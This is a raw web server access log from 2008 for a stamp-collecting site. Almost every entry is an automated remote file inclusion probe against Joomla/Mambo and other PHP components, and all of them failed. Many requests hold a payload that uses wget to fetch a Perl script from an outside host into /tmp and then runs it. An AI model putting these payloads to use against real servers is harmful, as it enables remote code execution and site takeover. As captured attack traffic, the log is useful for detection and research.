195.146.242.105 - - [15/Jun/2008:18:33:47 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.146.242.105 - - [15/Jun/2008:18:33:47 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
125.245.146.189 - - [15/Jun/2008:18:35:39 -0700] "GET /logs/access.log/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
125.245.146.189 - - [15/Jun/2008:18:35:40 -0700] "GET /logs/view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.46.13.250 - - [15/Jun/2008:18:38:08 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
202.5.95.201 - - [15/Jun/2008:18:39:12 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.5.95.201 - - [15/Jun/2008:18:39:12 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
81.16.50.217 - - [15/Jun/2008:18:39:34 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.16.50.217 - - [15/Jun/2008:18:39:34 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:18:39:44 -0700] "GET /logs/ HTTP/1.1" 200 7945 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
207.44.132.63 - - [15/Jun/2008:18:41:17 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
207.44.132.63 - - [15/Jun/2008:18:41:18 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
213.239.213.41 - - [15/Jun/2008:18:43:15 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
213.239.213.41 - - [15/Jun/2008:18:43:16 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
213.68.134.3 - - [15/Jun/2008:18:44:59 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
213.68.134.3 - - [15/Jun/2008:18:45:00 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
81.75.227.51 - - [15/Jun/2008:18:45:20 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.75.227.51 - - [15/Jun/2008:18:45:21 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.102.242.34 - - [15/Jun/2008:18:47:23 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.102.242.34 - - [15/Jun/2008:18:47:23 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.102.242.34 - - [15/Jun/2008:18:47:24 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.251.172 - - [15/Jun/2008:18:47:37 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.26.142.244 - - [15/Jun/2008:18:47:51 -0700] "GET /logs/access_080526.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.26.142.244 - - [15/Jun/2008:18:47:51 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.26.142.244 - - [15/Jun/2008:18:47:52 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
65.42.183.2 - - [15/Jun/2008:18:48:33 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.42.183.2 - - [15/Jun/2008:18:48:33 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.42.183.2 - - [15/Jun/2008:18:48:33 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:18:49:10 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:18:49:10 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
202.5.95.201 - - [15/Jun/2008:18:49:41 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.146.242.105 - - [15/Jun/2008:18:50:00 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:18:51:52 -0700] "GET /logs/access_080526.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:18:51:57 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:18:52:02 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.30.161.227 - - [15/Jun/2008:18:57:12 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
62.140.19.101 - - [15/Jun/2008:18:57:12 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
203.30.161.227 - - [15/Jun/2008:18:57:12 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
62.140.19.101 - - [15/Jun/2008:18:57:12 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.26.142.244 - - [15/Jun/2008:18:57:16 -0700] "GET /logs/access_080602.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.217.240 - - [15/Jun/2008:18:57:54 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.217.240 - - [15/Jun/2008:18:57:54 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.217.240 - - [15/Jun/2008:18:57:55 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:58:37 -0700] "GET /logs/access_080331.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:58:37 -0700] "GET //becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:58:37 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:58:42 -0700] "GET /logs/access_080310.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.241.217.240 - - [15/Jun/2008:18:59:38 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.108.80.142 - - [15/Jun/2008:19:00:17 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
89.108.80.142 - - [15/Jun/2008:19:00:17 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:19:01:27 -0700] "GET /logs/access_080526.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:19:01:27 -0700] "GET /logs/access_080526.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.140.19.133 - - [15/Jun/2008:19:01:34 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.133 - - [15/Jun/2008:19:01:34 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:02:23 -0700] "GET /logs/access_080331.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:02:23 -0700] "GET //becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:02:23 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:02:43 -0700] "GET /logs/access_080310.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:02:56 -0700] "GET //becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:02:56 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:02:56 -0700] "GET /logs/access_080331.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:19:03:11 -0700] "GET /logs/access_080310.log//becommunity/community/index.php?pageurl=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
58.226.23.119 - - [15/Jun/2008:19:04:18 -0700] "GET /logs/access_080526.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
58.226.23.119 - - [15/Jun/2008:19:04:19 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
58.226.23.119 - - [15/Jun/2008:19:04:19 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.93.62.99 - - [15/Jun/2008:19:06:38 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.62.99 - - [15/Jun/2008:19:06:39 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.62.99 - - [15/Jun/2008:19:06:39 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.75.227.51 - - [15/Jun/2008:19:09:40 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.80.142 - - [15/Jun/2008:19:12:39 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
203.30.161.227 - - [15/Jun/2008:19:13:11 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
80.93.62.99 - - [15/Jun/2008:19:13:12 -0700] "GET /logs/access_080526.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.241.217.240 - - [15/Jun/2008:19:15:06 -0700] "GET /logs/access_080526.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
80.206.222.236 - - [15/Jun/2008:19:15:57 -0700] "GET /logs/access_080602.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.206.222.236 - - [15/Jun/2008:19:15:57 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.206.222.236 - - [15/Jun/2008:19:16:01 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.206.222.236 - - [15/Jun/2008:19:16:16 -0700] "GET /logs/access_080602.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.206.222.236 - - [15/Jun/2008:19:16:16 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.206.222.236 - - [15/Jun/2008:19:16:20 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.250.121.2 - - [15/Jun/2008:19:16:34 -0700] "GET /logs/access_080526.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.250.121.2 - - [15/Jun/2008:19:16:35 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.250.121.2 - - [15/Jun/2008:19:16:36 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.67.237.142 - - [15/Jun/2008:19:17:07 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.67.237.142 - - [15/Jun/2008:19:17:07 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:19:19:31 -0700] "GET /logs/access_080609.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:19:20:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:19:20:21 -0700] "GET /logs/access_080602.log HTTP/1.0" 200 4992477 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:19:20:36 -0700] "GET /logs/access_080505.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:19:20:37 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:19:20:39 -0700] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.192.70.11 - - [15/Jun/2008:19:23:00 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
82.192.70.11 - - [15/Jun/2008:19:23:00 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.autoimmoannonce.com/lang/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
58.226.23.119 - - [15/Jun/2008:19:26:59 -0700] "GET /logs/access_080505.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
